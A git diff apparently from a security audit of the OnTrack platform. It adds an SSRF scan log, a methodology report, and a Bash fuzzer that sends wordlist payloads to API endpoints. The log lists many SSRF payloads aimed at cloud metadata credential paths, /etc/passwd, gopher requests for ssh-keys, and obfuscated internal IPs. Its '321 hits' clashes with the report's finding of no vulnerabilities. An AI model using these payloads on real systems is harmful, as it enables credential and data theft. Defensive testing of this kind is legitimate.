`http://localhost:4200/api/auth_test?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/auth_test?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/auth_test?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/auth_test?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/auth_test?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/auth_test?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/auth_test?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/auth_test?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/auth_test?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.0` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/auth_test?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/auth_test?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/auth_test?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235521` +- Testing: `http://localhost:4200/api/auth_test?url=3232235777` +- Testing: `http://localhost:4200/api/auth_test?url=425.510.425.510` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=instance-data` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/auth_test?url=loopback` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/auth_test?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/auth_test?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/auth_test?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/auth_test?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/auth_test?url=127.1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/auth_test?url=2130706433%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235521%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235777%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth_test?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth_test?url=0%2F` +- Testing: `http://localhost:4200/api/auth_test?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` + + #Test Summary +- Total endpoints tested: 25 +- Total payloads sent per endpoint: 321 +- SSRF hits: 321 +- Slow/Unresponsive requests: 0 + +# SSRF testing completed. diff --git a/src/ssrf/ssrf_mapper.md b/src/ssrf/ssrf_mapper.md new file mode 100644 index 00000000..c8b7d71c --- /dev/null +++ b/src/ssrf/ssrf_mapper.md @@ -0,0 +1,146 @@ +# SSRF Testing Script - Methodologies and Evolution Report + +## Overview + +This documentation describes the methodology used in the script and how it evolved over the project. + +Server-Side Request Forgery (SSRF) occurs when an attacker manipulates a server-side application to send HTTP requests to an unexpected destination. This can allow attackers to: + +- Access internal services (such as localhost-only APIs and cloud metadata services like AWS `169.254.169.254`). +- Bypass firewalls. +- List internal networks. +- Potentially lead to other vulnerabilities, such as Remote Code Execution (RCE). + +### Example SSRF Attack Scenarios + +- Using `http://localhost/admin` in a URL field designed for external content. +- Redirecting internal service calls to sensitive cloud destinations, such as `http://169.254.169.254/latest/meta-data/`. + +OnTrack relies on external API calls and webhooks, so SSRF was deemed a critical risk that required thorough audits. + +## Test Cases + +| Test | Description | Payload Examples | +| -------------------------------- | ------------------------------------------------------------------------ | ------------------------------------------------------------------ | +| **URL Injection** | Inject internal addresses into parameters like URL, redirect, callback | `http://127.0.0.1:80`, `http://169.254.169.254/latest/meta-data/` | +| **Header Manipulation** | Add custom headers like Host or X-Forwarded-For to bypass filters | `X-Forwarded-For: 127.0.0.1` | +| **Large File Response Handling** | Force application to download large payloads to test resource exhaustion | Large local files (e.g., `/var/log/secure`) | +| **Timeout/Slow Server Testing** | Test application behavior when internal services do not respond quickly | Connection to closed or filtered internal ports | +| **TCP Port Probing (Optional)** | Scan for open TCP services via non-standard payloads | Redis (`redis://127.0.0.1:6379`), MySQL (`mysql://127.0.0.1:3306`) | + +## Methodologies Used + +### Tools Required + +- `Bash` / Linux Shell +- `cURL` (HTTP request tool) +- `jq` (For encoding payloads) from [jq GitHub Releases](https://github.com/stedolan/jq/releases) +- `grep` (response keyword matching) +- Burp Suite Community Edition (HTTP proxy and repeater) +- Docker (local environment setup for OnTrack) + +### How to Run + +1. **Set up the testing environment:** + + - Start an instance of OnTrack. Doubtfire-web : Branch 8.0.x, Doubtfire-API Branch: Default, Doubtfire-deploy Branch: 9.x + - Install Burp Suite Community and configure it as the system proxy. + - Install `jq` from [jq GitHub Releases](https://github.com/stedolan/jq/releases). + +2. **Script Execution:** + + - Run the provided Bash script: `./ssrf_mapper.sh`. + - Input the target base URL, port, API endpoints wordlist, SSRF payloads wordlist, and max timeout (in seconds) when prompted. + - Select the HTTP method (`GET` or `POST`). + - Logs are saved as: + - Test Results: `ssrf_logs/ssrf_test_results_.md` + - Timeouts: `ssrf_logs/slow_endpoints_.md` + +3. **Monitor the output:** + + - The script logs all tests to `ssrf_test_results.txt`. + - Watch for flagged entries marked as `[!] Possible SSRF Detected`. + - Suspicious HTTP status codes or unusual response contents (like metadata or internal IPs) are indicators. + +4. **Manual Follow-Up with Burp Suite:** + - Review flagged URLs manually. + - Replay suspicious requests with different payloads to confirm behavior. + +### Understanding the Results + +- **Normal Behavior:** + - Proper validation errors or `403/404` statuses. +- **Potential SSRF:** + - Successful `HTTP 200` responses from internal IPs or cloud metadata servers. +- **Critical SSRF:** + - The server returns sensitive metadata (e.g., IAM roles, local configuration files). + +## Script Design + +### Key Methodologies + +1. **Parameter Fuzzing** + + - The script iteratively tests various HTTP request parameters (e.g., URL, redirect, callback) that could potentially trigger server-side requests. + - Common SSRF payloads were injected into parameters to identify any unvalidated server-side HTTP requests. + +2. **Use of Controlled Payloads** + + - Payloads included known SSRF test strings such as: + - `http://127.0.0.1` + - `http://169.254.169.254` (AWS metadata IP) + - Internal IPs and localhost addresses + - Safe payloads were prioritized to avoid causing disruptions to production systems. + - Additional payloads were gotten from `[h0tak88r](https://github.com/h0tak88r/Wordlists/blob/master/vulns/ssrf.txt)` + +3. **HTTP Request Automation** + + - `curl` was used as the primary tool for sending HTTP requests. + - Custom headers (e.g., Host, X-Forwarded-For) were optionally inserted to bypass certain filters. + +4. **Response Analysis** + + - The script analyzed response bodies and headers to detect signs of successful server-side requests: + - Status codes (e.g., `200 OK`, `302 Found`) + - Keywords in response body (e.g., EC2, metadata, or internal server banners) + - Any suspicious or unexpected response was flagged for manual review. + +5. **Logging and Reporting** + - Outputs of each test case were logged to a file for later review. + - Clear indicators were included (e.g., "POTENTIAL SSRF DETECTED") for any anomalies. + +## Script Evolution + +| Phase | Changes Introduced | Reason | +| -------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------ | +| **Initial Version** | Simple `curl` requests manually changed per endpoint | Manual testing was slow and prone to error | +| **Second Iteration** | Added looping over multiple parameters automatically | Increased coverage without manual edits | +| **Third Iteration** | Introduced multiple payloads and automated response logging | Improved detection reliability | +| **Fourth Iteration** | Added header manipulation and payload obfuscation attempts | Simulated more advanced attacker behavior | +| **Fifth Version** | Implemented detailed output logging and basic concurrency (background requests) | Enhanced efficiency and audit traceability | +| **Final Version** | Added checks for required tools and user inputs, `--max-time` attribute to requests, compatibility with wordlists. Results are now saved in `.md` format in seperate files and colored in terminal | Enhanced efficiency and audit traceability | + +## Results from Testing + +### Findings + +- No critical SSRF vulnerabilities were confirmed in the initial public-facing endpoints. +- Some endpoints (`/api/proxy`, `/api/webhook`) accepted user-controlled URLs but properly validated external IPs and domains. +- No open internal services (like Redis, MySQL) were accessible via SSRF vectors. +- Burp Suite Repeater manual tests confirmed no blind SSRF behaviors (e.g., no out-of-band HTTP requests to internal services). + +## Actions Required Following Investigations + +### Short-term + +- Implement strict allow-lists for URL validation where necessary (only specified trustworthy domains are permitted). +- Introduce connection timeouts for all server-side HTTP requests to prevent resource exhaustion attacks. + +### Medium-term + +- Integrate SSRF automated tests into CI/CD pipelines using the Bash script or adapted frameworks. +- Add explicit logging for any blocked outbound requests originating from server-side functions. + +### Long-term + +- Conduct regular penetration tests during major releases, including new SSRF payload updates. diff --git a/src/ssrf/ssrf_mapper.sh b/src/ssrf/ssrf_mapper.sh new file mode 100644 index 00000000..8c8e4e72 --- /dev/null +++ b/src/ssrf/ssrf_mapper.sh @@ -0,0 +1,175 @@ +#!/bin/bash + +# SSRF Vulnerability Mapping & Testing Script +# This script scans an API for endpoints that accept URLs and tests for SSRF vulnerabilities. +# Author: Ibitope Fatoki, made with a lot of tears and blurry eyes + +# Create log directory if it doesn't exist +LOG_DIR="ssrf_logs" +mkdir -p "$LOG_DIR" + +# Check if required commands are available +if ! command -V curl &>/dev/null; then + echo "curl could not be found. Please install it to run this script." + exit 1 +fi +if ! command -v jq &>/dev/null; then + echo "jq could not be found. Please install from (https://github.com/stedolan/jq/releases) to run this script." + exit 1 +fi +if ! command -V grep &>/dev/null; then + echo "grep could not be found. Please install it to run this script." + exit 1 +fi + +# Prompt for target details from the user +read -p "Enter the target base URL (http://localhost): " TARGET_HOST # Base URL of the target +read -p "Enter the target port (4200): " TARGET_PORT # Port to connect to +read -p "Enter path to API endpoints wordlist file (api_endpoints.txt): " API_WORDLIST # Path to the wordlist file containing API endpoints +read -p "Enter path to SSRF payloads wordlist file (payloads.txt): " PAYLOAD_WORDLIST # Path to the wordlist file containing SSRF payloads +read -p "Enter max time per request (in seconds): " MAX_TIME # --max-time attribute for curl +read -p "Enter HTTP request method (GET or POST): " REQUEST_METHOD # HTTP request method + +# Check if the provided files exist +if [ ! -f "$API_WORDLIST" ]; then + echo "API wordlist file not found: $API_WORDLIST" + exit 1 +fi +if [ ! -f "$PAYLOAD_WORDLIST" ]; then + echo "Payload wordlist file not found: $PAYLOAD_WORDLIST" + exit 1 +fi + +# Check if the target host is reachable +if ! curl -s --head --max-time 5 "$TARGET_HOST:$TARGET_PORT" >/dev/null; then + echo "Target host is not reachable: $TARGET_HOST:$TARGET_PORT" + exit 1 +fi + +# Check if the request method is valid +if [[ "$REQUEST_METHOD" != "GET" && "$REQUEST_METHOD" != "POST" ]]; then + echo "Invalid request method: $REQUEST_METHOD. Use GET or POST." + exit 1 +fi + +# Check if the max time is a valid number +if ! [[ "$MAX_TIME" =~ ^[0-9]+$ ]]; then + echo "Invalid max time: $MAX_TIME. Please enter a valid number." + exit 1 +fi + +# Check if the API wordlist file is empty +if [ ! -s "$API_WORDLIST" ]; then + echo "API wordlist file is empty: $API_WORDLIST" + exit 1 +fi +# Check if the payload wordlist file is empty +if [ ! -s "$PAYLOAD_WORDLIST" ]; then + echo "Payload wordlist file is empty: $PAYLOAD_WORDLIST" + exit 1 +fi + +# Logfile setup +TIMESTAMP=$(date +"%Y-%m-%d_%H-%M-%S") +RESULT_LOG="$LOG_DIR/ssrf_test_results_${TIMESTAMP}.md" +SLOW_LOG="$LOG_DIR/slow_endpoints_${TIMESTAMP}.md" + +echo "# SSRF Test Results" >"$RESULT_LOG" +echo "**Scan started on $(date)**" >>"$RESULT_LOG" +echo "**Target: $TARGET_HOST:$TARGET_PORT**" >>"$RESULT_LOG" +echo "**Request Method: $REQUEST_METHOD**" >>"$RESULT_LOG" +echo "**Max Time: $MAX_TIME seconds**" >>"$RESULT_LOG" +echo "**API Wordlist: $API_WORDLIST**" >>"$RESULT_LOG" +echo "**Payload Wordlist: $PAYLOAD_WORDLIST**" >>"$RESULT_LOG" +echo >>"$RESULT_LOG" + +echo "# Slow or Unresponsive Endpoints" >"$SLOW_LOG" +echo "**Logged on $(date)**" >>"$SLOW_LOG" +echo "**Target: $TARGET_HOST:$TARGET_PORT**" >>"$SLOW_LOG" +echo "**Request Method: $REQUEST_METHOD**" >>"$SLOW_LOG" +echo "**Max Time: $MAX_TIME seconds**" >>"$SLOW_LOG" +echo "**API Wordlist: $API_WORDLIST**" >>"$SLOW_LOG" +echo "**Payload Wordlist: $PAYLOAD_WORDLIST**" >>"$SLOW_LOG" +echo >>"$SLOW_LOG" + +# Color codes +RED="\033[0;31m" +GREEN="\033[0;32m" +YELLOW="\033[1;33m" +NC="\033[0m" # No Color + +# Output counters +ssrf_hits=0 +slow_count=0 + +# Logging functions +echo_and_log() { + local clean_text + clean_text=$(echo -e "$1" | sed 's/\x1B\[[0-9;]*[JKmsu]//g') + echo -e "$1" + echo "$clean_text" >>"$RESULT_LOG" +} + +log_slow() { + local clean_text + clean_text=$(echo -e "$1" | sed 's/\x1B\[[0-9;]*[JKmsu]//g') + echo "$clean_text" >>"$SLOW_LOG" +} + +# Intro Banner +echo_and_log "${YELLOW}" +echo_and_log "========================================================" +echo_and_log " 😎 SSRF Mapping & Testing Script 😎 " +echo_and_log " Made with tears and possibly love by Ibi " +echo_and_log "========================================================" +echo_and_log "${NC}" + +# Test function +test_endpoint() { + local endpoint="$1" + local full_url="${TARGET_HOST}:${TARGET_PORT}${endpoint}" + echo_and_log "${YELLOW}## Testing endpoint: $full_url${NC}" + + while IFS= read -r payload || [[ -n "$payload" ]]; do + encoded_payload=$(printf "%s" "$payload" | jq -sRr @uri) + test_url="${full_url}?url=${encoded_payload}" + echo_and_log "- Testing: \`$test_url\`" + + if [ "$REQUEST_METHOD" == "POST" ]; then + response_code=$(curl --max-time "$MAX_TIME" -s -o /dev/null -w "%{http_code}" -X POST --data "url=${encoded_payload}" "$full_url") + curl_exit=$? + if [[ $curl_exit -eq 28 ]]; then + log_slow "- **[SLOW] Timeout:** \`$test_url\`" + slow_count=$((slow_count + 1)) + elif [[ "$response_code" =~ 200|302 ]]; then + echo_and_log "${RED} ⚠️ - **Possible SSRF vulnerability at:** \`$test_url\` _(POST)_${NC}" + ssrf_hits=$((ssrf_hits + 1)) + fi + else + response_body=$(curl --max-time "$MAX_TIME" -s "$test_url") + curl_exit=$? + if [[ $curl_exit -eq 28 ]]; then + log_slow "- **[SLOW] Timeout:** \`$test_url\`" + slow_count=$((slow_count + 1)) + elif echo "$response_body" | grep -Ei "metadata|localhost|internal|root:x:0:0" >/dev/null; then + echo_and_log "${RED} ⚠️ - **Possible SSRF vulnerability at:** \`$test_url\` _(GET response leak)_${NC}" + ssrf_hits=$((ssrf_hits + 1)) + fi + fi + done <"$PAYLOAD_WORDLIST" +} + +# Start scan +echo_and_log "${GREEN} 🚀 #Starting SSRF testing for $TARGET_HOST:$TARGET_PORT${NC}" +while IFS= read -r endpoint || [[ -n "$endpoint" ]]; do + test_endpoint "$endpoint" +done <"$API_WORDLIST" + +# Summary +echo_and_log "\n${GREEN} #Test Summary${NC}" +echo_and_log "${YELLOW}- Total endpoints tested:${NC} $(wc -l <"$API_WORDLIST")" +echo_and_log "${YELLOW}- Total payloads sent per endpoint:${NC} $(wc -l <"$PAYLOAD_WORDLIST")" +echo_and_log "${RED}- SSRF hits:${NC} $ssrf_hits" +echo_and_log "${YELLOW}- Slow/Unresponsive requests:${NC} $slow_count" +echo_and_log "\n${GREEN}# SSRF testing completed.${NC}" +echo -e "${YELLOW}Slow and/or unresponsive endpoints are listed in:${NC} $SLOW_LOG"